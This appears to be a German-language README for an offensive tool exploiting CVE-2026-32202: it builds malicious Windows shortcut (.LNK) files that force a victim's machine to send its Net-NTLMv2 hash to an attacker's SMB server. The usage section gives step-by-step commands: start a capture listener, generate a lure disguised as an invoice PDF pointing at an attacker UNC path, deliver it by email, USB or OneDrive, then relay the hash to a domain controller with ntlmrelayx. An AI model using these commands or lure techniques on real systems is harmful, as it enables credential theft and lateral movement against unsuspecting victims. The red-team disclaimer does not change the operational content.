
Erzeugt bösartige LNK-Dateien, um Net-NTLMv2-Hashes über die Windows-Shell-UNC-Verarbeitung zu erzwingen, mit benutzerdefiniertem SMB-Listener und Relay-Integration für autorisierte Red-Team-Operationen.
Haftungsausschluss
Dieses Tool ist ausschließlich für autorisierte Red-Team- und Penetrationstest-Aktivitäten bestimmt.
Die unbefugte Nutzung gegen Systeme ohne ausdrückliche Genehmigung ist illegal.
Nutzung auf eigene Gefahr. Der Autor übernimmt keine Haftung für Missbrauch oder Schäden.
Beschreibung
NTLMv2-Hash-Erzwingung durch unvollständigen Windows-Shell-Schutz-Bypass (CVE-2026-32202). Erzeugt speziell präparierte LNK-Dateien, die beim Öffnen oder in der Vorschau im Explorer eine SMB/UNC-Authentifizierung erzwingen. Geringe Interaktion, funktioniert auf gepatchten Systemen, bei denen der Fix vom April 2026 unzureichend war. Aktiv in Engagements im Einsatz.
Hauptfunktionen
Was der Exploit tut
Das Tool erstellt eine präparierte .LNK, die die Behandlung von UNC-Pfaden in Target + IconEnvironmentDataBlock / ExtraData-Strukturen durch die Shell missbraucht. Wenn das Opfer den Ordner durchsucht oder die Datei mit der Maus überfährt/in der Vorschau anzeigt, initiiert die Windows-Shell eine SMB-Verbindung zum Angreifer-kontrollierten UNC-Pfad und leakt den Net-NTLMv2-Hash des Rechners/Benutzers. Keine Codeausführung auf dem Ziel – nur Credential-Erzwingung für Relay oder Cracking.
Warum es nützlich ist
Getestet auf
Abhängigkeiten
Installieren: pip install -r requirements.txt
Verwendung
# 1. Erfassungsserver starten (Angreifer-Host)
python smbcapture.py -i 0.0.0.0 -p 445 --output hashes.txt
# 2. Bösartige LNK erzeugen
python coercegen.py --unc \\attacker-ip\share\test --output "Invoice_Q2.lnk" --spoof "invoice.pdf"
# Optional: stabiler oder Bypass-Modus
python coercestable.py --unc \\attacker-ip\share\test --output "Report.lnk"
# 3. LNK ausliefern (USB, Freigabe, E-Mail-Anhang, OneDrive, etc.)
# 4. Auf Hash im Terminal + Datei warten. Beispiel-Relay:
ntlmrelayx.py -t smb://target-dc -c whoami --no-wmipriv
# oder LDAP-Relay für RBCD, HTTP für ADCS-Zertifikate, etc.
Exploit
Einschränkungen
Grundursache (kurz)
Unvollständiger Fix in der UNC-Pfad-Bereinigung der Windows-Shell und der ExtraData-Block-Verarbeitung für die LNK-Symbol-/Zielauflösung. Der Schutzmechanismus, der unbefugtes Netzwerk-Spoofing blockieren soll, löst während der Shell-Namespace-Enumeration weiterhin eine NTLM-Authentifizierung aus.